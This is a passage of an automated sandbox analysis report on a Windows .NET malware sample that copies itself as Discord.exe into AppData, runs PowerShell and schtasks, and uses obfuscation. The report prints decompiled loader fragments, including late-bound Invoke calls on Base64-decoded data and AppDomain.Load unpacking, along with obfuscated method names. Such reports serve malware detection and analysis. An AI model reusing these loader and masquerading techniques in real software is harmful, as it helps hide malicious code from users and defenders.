                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\Discord.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                    Source: Discord.lnk.0.drLNK file: ..\..\..\..\..\Discord.exe
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: s3OBQLA3xR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: s3OBQLA3xR.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    barindex
                    .NET source code contains method to dynamically call methods (often used by packers)
                    Source: s3OBQLA3xR.exe, jZqCUwrJdKr0z9RYd14cbRFGh4hvyqVQ29P148v6qUG9lxXZEbSwb5XHnXh1nYUDDR1h.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_1NHy9KwsxC1RYta4aWCRc5zXrDv2qZwmjq6tftd6nKrjzYO7kyxxSS7xLoL3zHFWCrNIaCWvZjhkuSApcY0.v6X5ExXRH3lNTp84b4b8XfUON3Cu9S8ohF2pVtHLLDQMs6SjXs8nIJCi1kZ9QA2zKwVi2Z3HbICIB4N0tUm,_1NHy9KwsxC1RYta4aWCRc5zXrDv2qZwmjq6tftd6nKrjzYO7kyxxSS7xLoL3zHFWCrNIaCWvZjhkuSApcY0.RAktkBmjHI5enPkjYsNL1670bUFsHQppKzSAaipnX3ERPqGVTVsXYCBLaWcjEU4KjefLH7muPxmmCYP8VYo,_1NHy9KwsxC1RYta4aWCRc5zXrDv2qZwmjq6tftd6nKrjzYO7kyxxSS7xLoL3zHFWCrNIaCWvZjhkuSApcY0.F6kC2uEC72v4mrWg4NpIvtH1qfkJVrstqNYXDaxaQZNFb6njAiTvvxZzi8I5sctac1gblxFukrhrdQTpSq3,_1NHy9KwsxC1RYta4aWCRc5zXrDv2qZwmjq6tftd6nKrjzYO7kyxxSS7xLoL3zHFWCrNIaCWvZjhkuSApcY0.et606mk5fqvKytaw7f76wM4ki8OfP7x9Rr4ewcP74LjE6EsDwlrH98M7vQ12rHTRUEORZbuSHkON1U11BbL,U9pHMOisPp.Sla7w63Sq2()}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: s3OBQLA3xR.exe, jZqCUwrJdKr0z9RYd14cbRFGh4hvyqVQ29P148v6qUG9lxXZEbSwb5XHnXh1nYUDDR1h.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{ddSPMX7Hq54DZlnQIudeqi5dcl6NSIm3cMpFdj5H3XoKJBQo3yjRz1XImrSVHXzqN3rM[2],U9pHMOisPp.Dr8WIudrtM(Convert.FromBase64String(ddSPMX7Hq54DZlnQIudeqi5dcl6NSIm3cMpFdj5H3XoKJBQo3yjRz1XImrSVHXzqN3rM[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: s3OBQLA3xR.exe, jZqCUwrJdKr0z9RYd14cbRFGh4hvyqVQ29P148v6qUG9lxXZEbSwb5XHnXh1nYUDDR1h.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { ddSPMX7Hq54DZlnQIudeqi5dcl6NSIm3cMpFdj5H3XoKJBQo3yjRz1XImrSVHXzqN3rM[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: Discord.exe.0.dr, jZqCUwrJdKr0z9RYd14cbRFGh4hvyqVQ29P148v6qUG9lxXZEbSwb5XHnXh1nYUDDR1h.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_1NHy9KwsxC1RYta4aWCRc5zXrDv2qZwmjq6tftd6nKrjzYO7kyxxSS7xLoL3zHFWCrNIaCWvZjhkuSApcY0.v6X5ExXRH3lNTp84b4b8XfUON3Cu9S8ohF2pVtHLLDQMs6SjXs8nIJCi1kZ9QA2zKwVi2Z3HbICIB4N0tUm,_1NHy9KwsxC1RYta4aWCRc5zXrDv2qZwmjq6tftd6nKrjzYO7kyxxSS7xLoL3zHFWCrNIaCWvZjhkuSApcY0.RAktkBmjHI5enPkjYsNL1670bUFsHQppKzSAaipnX3ERPqGVTVsXYCBLaWcjEU4KjefLH7muPxmmCYP8VYo,_1NHy9KwsxC1RYta4aWCRc5zXrDv2qZwmjq6tftd6nKrjzYO7kyxxSS7xLoL3zHFWCrNIaCWvZjhkuSApcY0.F6kC2uEC72v4mrWg4NpIvtH1qfkJVrstqNYXDaxaQZNFb6njAiTvvxZzi8I5sctac1gblxFukrhrdQTpSq3,_1NHy9KwsxC1RYta4aWCRc5zXrDv2qZwmjq6tftd6nKrjzYO7kyxxSS7xLoL3zHFWCrNIaCWvZjhkuSApcY0.et606mk5fqvKytaw7f76wM4ki8OfP7x9Rr4ewcP74LjE6EsDwlrH98M7vQ12rHTRUEORZbuSHkON1U11BbL,U9pHMOisPp.Sla7w63Sq2()}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: Discord.exe.0.dr, jZqCUwrJdKr0z9RYd14cbRFGh4hvyqVQ29P148v6qUG9lxXZEbSwb5XHnXh1nYUDDR1h.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{ddSPMX7Hq54DZlnQIudeqi5dcl6NSIm3cMpFdj5H3XoKJBQo3yjRz1XImrSVHXzqN3rM[2],U9pHMOisPp.Dr8WIudrtM(Convert.FromBase64String(ddSPMX7Hq54DZlnQIudeqi5dcl6NSIm3cMpFdj5H3XoKJBQo3yjRz1XImrSVHXzqN3rM[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: Discord.exe.0.dr, jZqCUwrJdKr0z9RYd14cbRFGh4hvyqVQ29P148v6qUG9lxXZEbSwb5XHnXh1nYUDDR1h.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { ddSPMX7Hq54DZlnQIudeqi5dcl6NSIm3cMpFdj5H3XoKJBQo3yjRz1XImrSVHXzqN3rM[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                    .NET source code contains potential unpacker
                    Source: s3OBQLA3xR.exe, jZqCUwrJdKr0z9RYd14cbRFGh4hvyqVQ29P148v6qUG9lxXZEbSwb5XHnXh1nYUDDR1h.cs.Net Code: PWxz7Gney6usw9eueX4CD2LGxqA1z1lnL73Ho9T7auA5xJSyHcdId84TwlZIk5OuWcRB System.AppDomain.Load(byte[])
                    Source: s3OBQLA3xR.exe, jZqCUwrJdKr0z9RYd14cbRFGh4hvyqVQ29P148v6qUG9lxXZEbSwb5XHnXh1nYUDDR1h.cs.Net Code: r9hz4Y205wmqSfrAQf0pAJLA2gMvIt0jQwqrolFAbOuIJBlhEaF4ZhfIP7XOxbnKY0Av System.AppDomain.Load(byte[])
                    Source: s3OBQLA3xR.exe, jZqCUwrJdKr0z9RYd14cbRFGh4hvyqVQ29P148v6qUG9lxXZEbSwb5XHnXh1nYUDDR1h.cs.Net Code: r9hz4Y205wmqSfrAQf0pAJLA2gMvIt0jQwqrolFAbOuIJBlhEaF4ZhfIP7XOxbnKY0Av
                    Source: Discord.exe.0.dr, jZqCUwrJdKr0z9RYd14cbRFGh4hvyqVQ29P148v6qUG9lxXZEbSwb5XHnXh1nYUDDR1h.cs.Net Code: PWxz7Gney6usw9eueX4CD2LGxqA1z1lnL73Ho9T7auA5xJSyHcdId84TwlZIk5OuWcRB System.AppDomain.Load(byte[])
                    Source: Discord.exe.0.dr, jZqCUwrJdKr0z9RYd14cbRFGh4hvyqVQ29P148v6qUG9lxXZEbSwb5XHnXh1nYUDDR1h.cs.Net Code: r9hz4Y205wmqSfrAQf0pAJLA2gMvIt0jQwqrolFAbOuIJBlhEaF4ZhfIP7XOxbnKY0Av System.AppDomain.Load(byte[])
                    Source: Discord.exe.0.dr, jZqCUwrJdKr0z9RYd14cbRFGh4hvyqVQ29P148v6qUG9lxXZEbSwb5XHnXh1nYUDDR1h.cs.Net Code: r9hz4Y205wmqSfrAQf0pAJLA2gMvIt0jQwqrolFAbOuIJBlhEaF4ZhfIP7XOxbnKY0Av
                    Source: C:\Users\user\Desktop\s3OBQLA3xR.exeCode function: 0_2_00007FFD9B7E00AD pushad ; iretd 0_2_00007FFD9B7E00C1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B6DD2A5 pushad ; iretd 1_2_00007FFD9B6DD2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B7F00AD pushad ; iretd 1_2_00007FFD9B7F00C1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B8C2316 push 8B485F92h; iretd 1_2_00007FFD9B8C231B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B6ED2A5 pushad ; iretd 4_2_00007FFD9B6ED2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8019D2 pushad ; ret 4_2_00007FFD9B8019E1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8000AD pushad ; iretd 4_2_00007FFD9B8000C1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8D2316 push 8B485F91h; iretd 4_2_00007FFD9B8D231B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B6BD2A5 pushad ; iretd 7_2_00007FFD9B6BD2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B7DBAE8 push E85A82D7h; ret 7_2_00007FFD9B7DBAF9
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B7DACFA push E95978A2h; ret 7_2_00007FFD9B7DAE29
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B7D00AD pushad ; iretd 7_2_00007FFD9B7D00C1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B8A2316 push 8B485F94h; iretd 7_2_00007FFD9B8A231B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B6CD2A5 pushad ; iretd 11_2_00007FFD9B6CD2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B7E00AD pushad ; iretd 11_2_00007FFD9B7E00C1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B8B2316 push 8B485F93h; iretd 11_2_00007FFD9B8B231B
                    Source: C:\Users\user\AppData\Roaming\Discord.exeCode function: 15_2_00007FFD9B7D00AD pushad ; iretd 15_2_00007FFD9B7D00C1
                    Source: C:\Users\user\AppData\Roaming\Discord.exeCode function: 16_2_00007FFD9B7C00AD pushad ; iretd 16_2_00007FFD9B7C00C1
                    Source: C:\Users\user\AppData\Roaming\Discord.exeCode function: 17_2_00007FFD9B8000AD pushad ; iretd 17_2_00007FFD9B8000C1
                    Source: C:\Users\user\AppData\Roaming\Discord.exeCode function: 18_2_00007FFD9B7D00AD pushad ; iretd 18_2_00007FFD9B7D00C1
                    Source: C:\Users\user\AppData\Roaming\Discord.exeCode function: 20_2_00007FFD9B7E00AD pushad ; iretd 20_2_00007FFD9B7E00C1
                    Source: s3OBQLA3xR.exe, CZoQY5TPrA.csHigh entropy of concatenated method names: '_9N48TDzPlp', 'sy68DDUpDh', '_9o87DLQc1n', 'cyDl7x4rnou9y4jNmiVSwBQWGahG', 'ac1VmwfQeZ5rtk0vNqL35KqxW6az', 'rSmDeTUawE7wPP7807wow4Ki45Iq', 'EEE1qt68Ifr4pCwbu32jKghGO3om', 'Zssh28rP4muRkGPC4LeVvpZahTvj', 'x3nVq4KS65LPH72Oi6Bi3vGETwua', 'IGVftO82XPk1jRUnUaOJ5vkRfaxc'
                    Source: s3OBQLA3xR.exe, jZqCUwrJdKr0z9RYd14cbRFGh4hvyqVQ29P148v6qUG9lxXZEbSwb5XHnXh1nYUDDR1h.csHigh entropy of concatenated method names: 'ohXYP8Uko9U95pjMwnQbLzUFEPdDh1gxY3Lxatao6nOlZFPCfrgY1HTpBlJlmHIGYMzb', 'PWxz7Gney6usw9eueX4CD2LGxqA1z1lnL73Ho9T7auA5xJSyHcdId84TwlZIk5OuWcRB', 'OJKhW1EvmFx7pk4vxpDjrRJvYJ9far7zYuFX4JEepPT1JmfE0O25zdDlGo86EUCxEiwv', 'o6lCx7lhJJ2LMtvK051igoGlPxHUaNrXIZwdZKbdTFp7TTyZV1fYgL8wleOAC4MV5hsr', 'EB0AUSwEn2ZUVM4yxNUc3dtLqy5lqtQiNii6diQvh1jZTJMU9OG90kddybdJ8Q2gPj2g', '_1hHnFcRcTVwKMoVDsztG3aJYzKkVxA3V27zB5I9Efq0R5F7hUoj5J9q2PndboJsZFQbF', 'jTUbfAvi5yCDAYlzI7OvS9HnpoRD6T3mM4ZaJDIN4KmYgmmPFnfn3CkU1On5fFAhtIAL', 'PNZmqOCVf9WZber8xvC3lwmCoSwJzfknoDxAvp8kDmDyBZUOqcXjF5Ss3Dg5CuODA7ut', 'jEtJk6YmDSKTdcK65x6qMNo8jnLwkkJLMC7jrYkbB2ohCx6JPjZgsX04msoW9YkEyY3T', 'iEgdlhIqZOTUNE6aLhSFH5zABLx4EXZmv6nPBdXaYgRwBNBcoQxySObpw5BLb93TsNP5'
                    Source: s3OBQLA3xR.exe, sobWCqEaS5.csHigh entropy of concatenated method names: 'h1gE9kffIY', 'n2rjTga0nCPTeZiYYZTgtFWpi4jW', '_9KzP4xoYMJSNc9E23pv58qTmrxcV', 'lLlNzB2h8MKY7t1gX6zkhsmjs6Xp', 'FZX4QAuopMG0e4YxMVGoirF7dIs8'
                    Source: s3OBQLA3xR.exe, 6mxeqGA8sGKwxoWnPU3gFq7MAvGAa88aOk2fUQoaodsFPsM7YR1gydyk9eQg2nc9Um4G.csHigh entropy of concatenated method names: 'K6yUrNFATVoGVqtQ2J7fmVMdUwHyLi29ZHSRSW1wVOLlHyqBumYz1Xf99CfoB4EboXnl', '_0BQ3F0Ehl9xngE4QA0amkyOgawIz7J6HbPSnpgvWVuH', 'YYgUewv3k3mbgAPGphUDp5EOF1tyv3JNnnFvArMiQ0T', 'hcDYmIIenLtT2fh8CVzT1iDyzuaw57N1bFFxvM94x8n', 'yeDmKkRW2lnI4uOuPBBx3bPpflrrf0ROrflKCQbA27d'
                    Source: s3OBQLA3xR.exe, xvglY57lNk9vQYqTfbKTBIlchHJYPPgp5YJaV63YWyHSbagxNbKBjxAD4KeBAH1BOeu7.csHigh entropy of concatenated method names: 'FRD8GC4inkaTauOGW0yWfUW6CC1TEVmBiP7NEZnYikjgTQ942rLCTBZZd9NdJaA8tz7X', 'bHnkGDpXqFzt70MnWagzYN5yX1smqNOidboKqkKI2eaCWKJXeswzVych0Wp1PIDBTUHu', '_0tGYNqW6Tm3FUaxV9VzNKUey26iSUAImqOuJqHbztjriPY8GRzCh7zALlD1ivxzivv6T', '_8ieB9V4HS3NhLDTdSVkvPiZczbAYydc3mjDJxqiVefVT1IKCPzFkiBsuAJOWP9GZwXkO', 'rH289oWq0fSMYtvt05itzsuNqdayt3CElayt86GY8QGIQJB70HOBi1oeZdIudiSQRP3q', 'kAZ22kEE53ZFygpt8mtUfVWCKUBf1Q2ICnWbzHJkfYuJqlJ2w2iWqKKKowerYv5Xrf2f', 'mELwor4E4WN8BzyKIfwKcue9PQCYI583ocJRxA9z4QyD47PoX7Ss16YnuRPPAn9SIu9y', 'HkS6hhdvSpSdlXnyQBIAVdzj9JBCvvM362mzto0U4gdSak4keKrwEnQ8vODFuEayu2KF', 'ofsUYbfRDOdoLbO9DS5zyu98s4ji1N2dD4vnoc6ROpzjE1QAu303DdlXhrwvcyDKynfw', 'ax1uNjsuN7DgGS4s7RN2NLp29tKDKu6WUCatpY7f9BpiEY09lssUNujchmF17RGoBpwn'
                    Source: s3OBQLA3xR.exe, U9pHMOisPp.csHigh entropy of concatenated method names: 'V1ebUJOBAV', 'N8Mno0anep', 'El3GnIDnLf', 'ANiwQr3ERh', '_8eC744DY2y', 'MdY7Ll7gYs', 'bzN1Mlomzo', 'VMlY5YX2QA', '_48i9XQq3nG', 'YJaeefkY2s'
                    Source: s3OBQLA3xR.exe, NRAeYCnbqOCZiFjqnN8SJKmkAMWNrpsv6Rb1U06ICthKqLloDf62JFflqZ6EQmsdumIbzy5s19huEwlg5zQ.csHigh entropy of concatenated method names: 'ligJKKSF1n1mRZKcvTI6chF8QRc8p8mbtBsKgjwJpp50rEb2Ju3RtUXUgwIxEsZD1OvJXNcUPCv8OTygEQi', 'f5uV8pn7lmcIDAa6g8Pl7c7mfzdr9pCz38BqZfC9XiLvFuBcX7IH7pCR4bWsHJMoALRqSuMQlhEO1owX2va', 'rkUPK0TMy82PJ44L80TKiSoKnaTy6dJFUjgYUx8bOsCeB4L1g2Awb3ohBs4xIIYRCkUbomhGu49a1ZGIWFx', 'jMWrGzt4HSckisu6h2mXyDfr6fdcMSau4sajG4ggcL2WoXTiAhumPh6ceCgyC0y5N9IUND4e0lobEBxwnLb', 'fP2RtqhTTC1UT5NKYEGbkkDOcZgbFyyqYgqANKnUFwjXXr1cGz8gDKiRtfQRGYqNRWMqblkTk89Syl4zC8L', 'avkaseHzf1TOnKieFjC2zxWwRkzGPQlPNudU53CY3xyE5hZnBKQt2cOmMmabWZuaRZuf5AYsVpSEKjEKTaY', 'cjPjGgi53fkGbOSu54282n9YtKV9d8U84FmH39z0V4A1tBWTEhpoEYYb42U8C35bX1esYPhj1kctH983EG3', 'Y8u9hBZuHt4IbFMcCnKF6XmwGEKiliKQslqvX1ypJ5jDcMXtlP2QATtLNfDwK0EUinfWLOyBr6nMcl2oL82', 'aZLnZuxmvgWCGnycKXQlANyGMtdkwFQsCxuuvfAyafUPUlGQZabmbcyCCNdVlV3yz29B99FjrbkGt9NlTwi', 'Ps3umLucOhLRAfDMi4gDHYqZNHcMenflp7TaKZ2WUsVPygXehATuqxabxw0236utz4v4k9xhL6CQMDWuM69'
